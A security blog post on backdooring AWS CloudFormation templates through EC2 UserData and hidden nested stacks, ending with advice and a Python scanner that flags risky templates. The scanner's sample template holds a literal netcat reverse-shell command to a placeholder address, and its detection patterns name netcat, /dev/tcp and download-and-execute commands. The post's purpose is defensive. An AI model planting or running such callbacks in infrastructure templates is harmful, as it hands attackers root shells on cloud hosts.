
CloudFormation Templates: What’s in that Stack?

October 11, 2019

What would happen if someone in your organization provisioned a stack from a template linked in a blog post, and that stack created new Identity and Access Management (IAM) roles, disabled logging services or created new security groups? Would you know?

In preparation for a research project I needed to create the AWS infrastructure that would run Docker, Kubernetes and our containerized app. I also needed to enable and configure multiple AWS resources, including EC2 instances, security groups, subnets and IAM roles. With a working knowledge of the basic resources the project needed, I turned to Google in the hope of finding an example, and quickly stumbled upon a few helpful CloudFormation templates (CFTs) from someone who had undertaken a similar project.

CloudFormation templates can be used to spin up individual resources or entire environments. A template is a text file written in JSON or YAML (commonly saved with a .json, .yaml or .template extension) that declares the resources to be provisioned and their properties. The resources a template describes are created, updated and deleted as a unit called a stack. Once written, a template can be reused in other AWS accounts and regions by changing a few parameters.

To launch the template I found in my Google search, all I had to do was click a Launch Stack button on the blog post. The link opened the CloudFormation console in my own AWS account with the author's template URL already filled in, and a couple of clicks later the deployment was under way.

[Image: Launch Stack button]

Easy, right? All too easy.

Once the underlying infrastructure of the project was provisioned and working, I went back and took a deeper look at one of the templates and wondered what the file was doing. I provisioned first and asked questions later.

Not the best idea.

Scrolling through the YAML file I saw that the EC2 instance's UserData (the bootstrap script CloudFormation hands to the instance, which cloud-init runs as root at first boot) installed packages and executed shell commands as part of the provisioning process.

[Figure: CloudFormation Image 1]

My curiosity was piqued. How easy would it be to backdoor a CloudFormation template? I decided to add two commands to the CFT alongside the existing bootstrap commands: the first installs nmap-ncat (the package that provides nc on Amazon Linux) and the second uses netcat to connect back to a remote listener.

[Figure: CloudFormation Image 2]

Upon creation of the stack I had a working EC2 instance, but my remote listener already held a shell on it, and because the bootstrap script runs as root, the shell was root as well.

[Figure: CloudFormation Image 3]

Great, but somewhat obvious to anyone who took a second to glance at the CFT. How could I hide the malicious commands from the user? CloudFormation allows nested stacks. The top-level stack is called the root stack, and a root stack can have one or more nested stacks beneath it that provision additional resources; each nested stack is declared as an AWS::CloudFormation::Stack resource whose TemplateURL points at another template stored in S3.

The image below shows the root stack calling a nested stack for the GitlabInstance resource. The nested stack's TemplateURL points at a second CFT hosted in a publicly readable S3 bucket, so anyone who reads only the root template never sees the commands in it.

[Figure: CloudFormation Image 5]

As before, the complete stack is deployed from the AWS console and succeeds: the template spins up a working EC2 instance, and that instance connects back to the listener.

[Figure: CloudFormation Image 6]

Conclusion: CFTs need to be analyzed first.

This is an example of a basic formation template attack. It’s opportunistic and it would be very hard to target a specific organization in this manner, but it clearly illustrates that CloudFormation templates (CFTs) need to be analyzed prior to deployment.

We suggest prevention tools.

From a security perspective it is critical to understand the actions within the formation template before it is deployed. If there are nested stacks being called, they need to be analyzed as well.

Analyze what resources are being provisioned, what they are used for and whether they are labeled. For example, if a security group is created, look closely at both the inbound and the outbound rules. Most CFTs I have seen only lock down inbound connections and leave outbound wide open; that was the case for the template in the example above, and it is what let the callback reach the listener. Note also that a security group which declares no SecurityGroupEgress rules at all gets the VPC default, which allows all outbound traffic.
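The following is an added example (not code from the original post, and not any vendor's scanner) of the pre-deployment review the conclusion asks for. It takes a template constructed to mirror the scenario above (a callback planted in an instance's UserData, a GitlabInstance nested stack pulled from an arbitrary bucket, and a security group that locks down inbound but leaves outbound open), renders the UserData intrinsics back into the plain script that would run as root, and reports what a reviewer should read before clicking Launch Stack. The template itself, the listener address 198.51.100.7, the bucket names, the AMI ID and the callback indicator patterns are all assumptions made for this example.

```python
"""Static review of a CloudFormation template before it is launched.
Added example, not code from the original post.  SAMPLE_TEMPLATE is
constructed to mirror the post's scenario (callback in UserData, nested
stack from an arbitrary bucket, open egress); 198.51.100.7 is a
documentation address, the AMI ID and bucket names are placeholders."""
import base64
import json
import re
from urllib.parse import urlparse

# JSON form so the standard library can parse it (YAML short tags such as !Base64 need a loader that knows them).
SAMPLE_TEMPLATE = json.loads(r'''{
  "AWSTemplateFormatVersion": "2010-09-09",
  "Resources": {
    "AppSecurityGroup": {"Type": "AWS::EC2::SecurityGroup", "Properties": {
      "GroupDescription": "app hosts",
      "SecurityGroupIngress": [{"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "CidrIp": "10.0.0.0/8"}],
      "SecurityGroupEgress": [{"IpProtocol": "-1", "CidrIp": "0.0.0.0/0"}]}},
    "AppInstance": {"Type": "AWS::EC2::Instance", "Properties": {
      "ImageId": "ami-0123456789abcdef0", "InstanceType": "t3.micro",
      "UserData": {"Fn::Base64": {"Fn::Join": ["", [
        "#!/bin/bash -xe\n",
        "yum install -y docker\n",
        "yum install -y nmap-ncat\n",
        "nc 198.51.100.7 4444 -e /bin/bash &\n"]]}}}},
    "GitlabInstance": {"Type": "AWS::CloudFormation::Stack", "Properties": {
      "TemplateURL": "https://s3.amazonaws.com/some-random-bucket/gitlab.template"}}
  }
}''')

# Shell fragments that have no business in an application host's bootstrap (constructed indicator list).
CALLBACK_PATTERNS = [
    r"\b(nc|ncat|netcat)\b.*\s-e\s",     # netcat handing a shell to a remote host
    r"/dev/tcp/",                         # bash built-in reverse shell
    r"\b(curl|wget)\b.*\|\s*(ba)?sh\b",   # download-and-execute
    r"\b(nmap-ncat|netcat|socat)\b",      # installing the tooling at all
]

def flatten(value):
    """Render the intrinsics that wrap UserData (Fn::Base64, Fn::Join, Fn::Sub, Ref) into plain script text."""
    if isinstance(value, str):
        return value
    if isinstance(value, dict) and len(value) == 1:
        (fn, arg), = value.items()
        if fn == "Fn::Base64":
            return flatten(arg)                    # what is encoded is what runs
        if fn == "Fn::Join":
            return arg[0].join(flatten(p) for p in arg[1])
        if fn == "Fn::Sub":
            return flatten(arg[0] if isinstance(arg, list) else arg)
        if fn == "Ref":
            return "${%s}" % arg                   # left unresolved for the reader
    return json.dumps(value)

def user_data_script(props):
    """UserData as reviewable text, whether it is an intrinsic tree or a base64 string pasted into the template."""
    ud = props.get("UserData")
    if isinstance(ud, str):
        try:
            return base64.b64decode(ud, validate=True).decode()
        except (ValueError, UnicodeDecodeError):
            return ud
    return flatten(ud) if ud is not None else ""

def bucket_of(url):
    u = urlparse(url)
    if re.match(r"^s3([.-][a-z0-9-]+)?\.amazonaws\.com$", u.netloc):
        return u.path.lstrip("/").split("/", 1)[0]  # path-style: https://s3.<region>.amazonaws.com/<bucket>/key
    return u.netloc.split(".")[0]                   # virtual-hosted: https://<bucket>.s3.<region>.amazonaws.com/key

def analyze_template(template, trusted_buckets=()):
    """(resource name, finding) pairs to read before clicking Launch Stack; nested stacks may only come from trusted_buckets."""
    findings = []
    for name, res in template.get("Resources", {}).items():
        rtype, props = res.get("Type", ""), res.get("Properties", {})
        if rtype == "AWS::CloudFormation::Stack":
            url = props.get("TemplateURL", "")
            if bucket_of(url) not in trusted_buckets:
                findings.append((name, "nested stack from untrusted bucket %r; review %s too" % (bucket_of(url), url)))
        elif rtype in ("AWS::EC2::Instance", "AWS::AutoScaling::LaunchConfiguration"):
            for line in user_data_script(props).splitlines():
                if any(re.search(p, line) for p in CALLBACK_PATTERNS):
                    findings.append((name, "UserData (runs as root) contains: %s" % line.strip()))
        elif rtype == "AWS::EC2::SecurityGroup":
            if "SecurityGroupEgress" not in props:
                findings.append((name, "no egress rules declared; VPC default is allow-all outbound"))
            for rule in props.get("SecurityGroupEgress", []):
                if rule.get("CidrIp") == "0.0.0.0/0" or rule.get("CidrIpv6") == "::/0":
                    findings.append((name, "egress to anywhere (protocol %s); a callback is not blocked" % rule.get("IpProtocol")))
        elif rtype.startswith("AWS::IAM::"):
            findings.append((name, "creates %s; read every policy statement it attaches" % rtype))
    return findings

if __name__ == "__main__":
    for resource, finding in analyze_template(SAMPLE_TEMPLATE, trusted_buckets=("my-org-cfn-templates",)):
        print("%-17s %s" % (resource, finding))
```

Running it prints one line per finding. The only thing that silences the nested-stack finding is listing the bucket in trusted_buckets, which is the point: a TemplateURL is a second template you have not read, and it has to be reviewed the same way. For YAML templates that use the short-form tags (!Base64, !Join, !Sub), convert them to JSON or load them with a YAML loader that registers those tags before handing the resulting dict to analyze_template.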

Make sure the users deploying templates do not have overly permissive permissions. CloudFormation creates resources with the permissions of the user who runs it (or of the service role that user passes to it), so if a template is compromised, a deploying user who cannot create IAM roles or security groups cannot be used to create those malicious resources either. Watch the service-role path as well: a user who is allowed to pass an administrator role to CloudFormation effectively has that role's permissions.

Several cybersecurity solution providers have the ability to scan formation templates for risky patterns, and open-source linters such as cfn-lint and cfn_nag catch the mechanical ones (open security groups, wildcard IAM actions). Use them, but remember that they match patterns; someone still has to read the UserData script and every nested template.



By: Dan Kiraly

Senior Research Analyst
